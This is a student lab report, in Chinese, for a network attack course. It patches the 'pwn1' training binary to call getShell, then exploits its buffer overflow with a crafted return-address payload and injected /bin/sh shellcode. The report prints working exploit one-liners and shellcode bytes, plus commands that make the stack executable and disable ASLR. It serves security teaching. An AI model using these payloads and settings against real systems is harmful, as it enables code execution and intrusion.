2018-2019-2 20165330《网络对抗技术》Exp1 PC平台逆向破解
目录
实验目标
- 本次实验的对象是一个名为
pwn1
的linux可执行文件。 - 该程序正常执行流程是:
main
调用foo
函数,foo
函数会简单回显任何用户输入的字符串。 - 该程序同时包含另一个代码片段,
getShell
,会返回一个可用Shell
。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode
。
实验内容
- 手工修改可执行文件,改变程序执行流程,直接跳转到
getShell
- 利用
foo
函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell
函数 - 注入一个自己制作的
shellcode
并运行这段shellcode
知识点描述
- 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
- 使用
objdump -d 20165330zyx
可查看可执行文件20165330zyx
的反汇编代码及其对应机器码
- 可知:
NOP
:无作用,英文"no operation"的简写,意思是"do nothing"(机器码90)JNE
:若不相等则跳(机器码75JE
:若相等则跳(机器码74JMP
:无条件转移指令。段内直接短转Jmp short(机器码:EB),段内直接近转移Jmp near(机器码:E9),段内间接转移Jmp word(机器码:FF),段间直接(远)转移Jmp far(机器码:EA)CMP
:比较指令,cmp的功能相当于减法指令。它不保存结果,只是影响相应的标志位(机器码39)
- 掌握反汇编与十六进制编程器
- 反汇编指令:
objdump -d objfile
,关于其他用法可参考Linux下C程序的反汇编- 关于管道,输入、输出重定向参考linux下输入输出重定向和管道符
- 十六进制编程器:用来以16进制视图进行文本编辑的编辑工具软件,其实我们只需要用各系统都兼容的
vim编辑器
就可以实现十六进制编辑的功能。具体步骤如下:
- 输入命令
vi 20165330zyx
查看可执行文件内容,发现大部分是我们没法理解的乱码;- 按
esc
后在底行输入:%!xxd
将显示模式切换为16进制模式;- 进行相关操作后,输入
:%!xxd -r
转换16进制为原格式。
- 能正确修改机器指令改变程序执行流程
- 能正确构造payload进行bof攻击
实验步骤
手工修改可执行文件,改变程序执行流程,直接跳转到getShell
函数
- 用
objdump -d 20165330zyx
指令查看可执行文件的反汇编结果 - 锁定修改目标
80484b5: e8 d7 ff ff ff call 8048491 <foo>
- 对比
getShell
函数的地址0804847d
和foo
函数的地址08048491
,可以发现两地址之差为十六进制14;
- call汇编指令的机器码为e8,我们可以锁定这部分,后面的
d7 ff ff ff
这四个字节为数值部分,代表指令跳转时需要与eip
寄存器相加的偏移量 - 如果我们想让函数调用
getShell
,只需要修改d7 ff ff ff
即可。由于数值存储方式为小端方式,所以锁定需要改的字节为d7
,将它与地址差14做减法运算后的值为c3 - 下面修改可执行文件,将其中的
call
指令的目标地址由d7ffffff
变为c3ffffff
cp 20165330zyx 20165330pwn2
复制文件- 使用
vi 20165330pwn2
编辑可执行文件; - 按
esc
后,输入%!xxd
将显示模式切换为十六进制模式 - 在底行
/d7
查找需要修改的内容,将d7改为c3 - 转换16进制为原格式:
:%!xxd -r
- 保存退出:
:wq
- 此时我们反汇编可看到
call
指令调用的函数被改
- 输入
./20165330pwn2
运行该可执行文件
利用foo
函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell
函数
- 可执行文件正常运行是调用
foo
函数,我们发现这个函数有Buffer overflow漏洞 foo
函数读入字符串,但系统只预留了32字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址- 正常时
call
调用foo
,同时在堆栈上压上返回地址值0x80484ba
- 确认输入字符串哪几个字符会覆盖到返回地址
- 用
gdb 20165330pwn
(pwn的副本)调试程序,输入有规律的字符串如1111111122222222333333334444444412345678
,发生段错误产生溢出
info r
查看寄存器eip的值,发现输入的1234被覆盖到堆栈上的返回地址
- 这是我们就将
getShell
的地址0x0804847d
把1234替换即可 - 由于数据按小端存储,我们的正确输入为
11111111222222223333333344444444\x7d\x84\x04\x08
- 因为我们没法通过键盘输入
\x7d\x84\x04\x08
这样的16进制值,输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
生成包括字符串的一个文件(\x0a
表示回车) - 使用16进制查看指令
xxd
查看input文件的内容是否如预期 - 确认无误后用
(cat input;cat) | ./20165330pwn
将input中的字符串作为可执行文件的输入
注入一个自己制作的shellcode
并运行这段shellcode
- 下载execstack程序以便接下来可以设置易于攻击的环境:
apt-get install execstack
- 准备工作
- 修改些设置
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
- 查看地址随机化的状态:
more /proc/sys/kernel/randomize_va_space
- 关闭地址随机化:
echo "0" > /proc/sys/kernel/randomize_va_space
- 修改些设置
- 构造要注入的payload
- 目的:将shellcode代码写入buffer(缓冲区足够大),或把shellcode放在返回地址后(缓冲区小),把返回地址改为buffer的首地址
- 我们选择retaddr+nops+shellcode结构来攻击buf,在shellcode前填充nop的机器码90:
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
//上面的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
//特别提醒:最后一个字符千万不能是\x0a
- 注入:
(cat input_shellcode;cat) | ./20165330pwn
- 再打开一个终端查看执行文件进程号
ps -ef | grep 20165330pwn
- 启用gdb调试进程,
attach 2222
与进程建立连接 - 设置断点查看注入buf的内存地址
disassemble foo //反汇编
break *0x080484ae //设置断点
//在另外一个终端中按下回车
c
继续info r esp
查看esp栈顶指针的地址- 使用
x/16x 0xffffd33c
查看其存放内容,看到01020304
,就是返回地址的位置。根据我们构造的input_shellcode
可知,shellcode就在其后,所以地址是0xffffd340
,即0xffffd33c加上4字节
c
-quit
退出gdb调试,回到之前的终端输入exit
退出命令,修改之前的\x4\x3\x2\x1
部分:perl -e 'print "A" x 32;print"\x40\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
- 再次运行
(cat input_shellcode;cat) | ./20165330pwn
后发现执行成功
实验过程中遇到的问题
- 在实验过程中虚拟机连接网络失败,试了之前所有方法都没效果
解决办法:参考如何解决VMware Workstation虚拟机无法上网,重置网络设置之后重启虚拟机即可连接网络。
- 在运行pwn1时出现错误提示:
[ bash: ./pwn1:没有那个文件或目录]
,但ls命令下又能看到存在pwn1文件
解决办法:参考64位Kali无法顺利执行pwn1问题的解决方案,一般可解决。
- 在对上一个问题进行解决时,按照方法却出现了错误提示
kali无法安全地用该源进行更新,所以默认禁用该源
,kali无法更新源
解决办法:参考解决kali更新源时出现签名无效问题,我将更新源换成该博客中的内容后在进行
apt-get update
更新成功,之后输入apt-get install lib32z1
32位运行库安装成功,文件可执行
- 下载execstack程序时,出现错误提示
实验感想
- 实验收获与感想
在这次实验中不仅懂得了什么是缓冲区溢出,也动手实现了缓冲区溢出,并且也把上学期所学的一些内容又串联在了一起,加深了我对堆栈的理解。
- 什么是漏洞?漏洞有什么危害?
- 缓冲区溢出就是输入的内容超过所分配的缓冲区空间,被溢出的内容由于设计的缺陷没有被立刻检查到,而破坏堆栈覆盖一些原始数据。
- 会导致程序运行失败、系统关机、重新启动,或者执行攻击者的指令,比如非法提升权限。
2018-2019-2 20165330《网络对抗技术》Exp1 PC平台逆向破解的更多相关文章
- 20155324《网络对抗》Exp1 PC平台逆向破解(5)M
20155324<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为~pwn1~的~linux~可执行文件. 该程序正常执行流程是:~main~调用~foo~ ...
- 20155232《网络对抗》 Exp1 PC平台逆向破解(5)M
20155232<网络对抗> Exp1 PC平台逆向破解(5)M 实验内容 (1).掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(1分) (2)掌握反汇编与十六进制编程 ...
- 20155227《网络对抗》Exp1 PC平台逆向破解(5)M
20155227<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数 ...
- 2018-2019-2 20165236郭金涛《网络对抗》Exp1 PC平台逆向破解
2018-2019-2 20165236郭金涛<网络对抗>Exp1 PC平台逆向破解 一.实验内容 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分) 2.掌 ...
- 20155208徐子涵 《网络对抗》Exp1 PC平台逆向破解
20155208徐子涵 <网络对抗>Exp1 PC平台逆向破解 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数 ...
- 20145325张梓靖 《网络对抗技术》 PC平台逆向破解
20145325张梓靖 <网络对抗技术> PC平台逆向破解 学习任务 shellcode注入:shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中,并 ...
- # 《网络对抗》Exp1 PC平台逆向破解20155337祁家伟
<网络对抗>Exp1 PC平台逆向破解20155337祁家伟 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会 ...
- 20145206邹京儒《网络对抗技术》 PC平台逆向破解
20145206邹京儒<网络对抗技术> PC平台逆向破解 注入shellcode并执行 一.准备一段shellcode 二.设置环境 具体在终端中输入如下: apt-cache searc ...
- 20145331魏澍琛 《网络对抗技术》 PC平台逆向破解
20145331魏澍琛 <网络对抗技术> PC平台逆向破解 学习任务 1.shellcode注入:shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中 ...
- 20145336张子扬 《网络对抗技术》 PC平台逆向破解
#20145336张子扬 <网络对抗技术> PC平台逆向破解 ##Shellcode注入 **基础知识** Shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对 ...
随机推荐
- c#直接调用ssis包实现Sql Server的数据导入功能
调用ssis包实现Sql Server的数据导入功能网上已经有很多人讨论过,自己参考后也动手实现了一下,上一次笔者的项目中还用了一下这个功能.思前想后,决定还是贴一下增强记忆,高手请54. 1.直接调 ...
- js中对象的深度复制
// 对象的深度复制 cloneObj(oldObj) var cloneObj = function (obj) { var newObj = {}; if (obj instanceof Arra ...
- OpenGL 知识二
OpenGL综述 September 14, 2014 学习OpenGL是学习计算机图形学的一个工具,因为计算机上图形的显示要依靠底层的软件和硬件,学习图形学除了学习基本的概念,线,曲面,图形生成,变 ...
- OpenGl 知识一
写在前面 啦啦啦,搞了很久的Unity Shaders,越学越觉得基础知识很重要.学Unity Shader的时候,总会想,shader到底是什么呢?shader的pipeline是什么呢?它们是怎么 ...
- Maven update project...后jdk变成1.5,update project后jdk版本改变
Maven update project...后jdk变成1.5,update project后jdk版本改变 ============================== 蕃薯耀 2018年3月14 ...
- IOPS性能指标
如何计算mysql的IOPS? qps 每秒处理的查询数tps 每秒处理的事务数IOPS,每秒磁盘进行的I/O操作次数 今天看到一篇文章说磁盘理论最大IOPS为200左右,我有两个疑问:1.MYSQL ...
- 递归的几个demo
/** * Created by root * Description : 递归函数 */ object RecursionTest { def main(args: Array[String]): ...
- linux下jdk简单配置记录
记录哈,搭建环境的时候,copy使用方便. vim /etc/profile export JAVA_HOME=/usr/java/jdk1.7.0_79export PATH=$JAVA_HOME/ ...
- 【代码审计】ThinkSNS_V4 任意文件下载漏洞分析
0x00 环境准备 ThinkSNS官网:http://www.thinksns.com 网站源码版本:ThinkSNS V4 更新时间:2017-09-13 程序源码下载:http://www ...
- 第十七篇:IO复用之select实现
前言 在看过前文:初探IO复用后,想必你已对IO复用这个概念有了初步但清晰的认识. 接下来,我要在一个具体的并发客户端中实现它(基于select函数),使得一旦服务器中的客户进程被终止的时候,客户端这 ...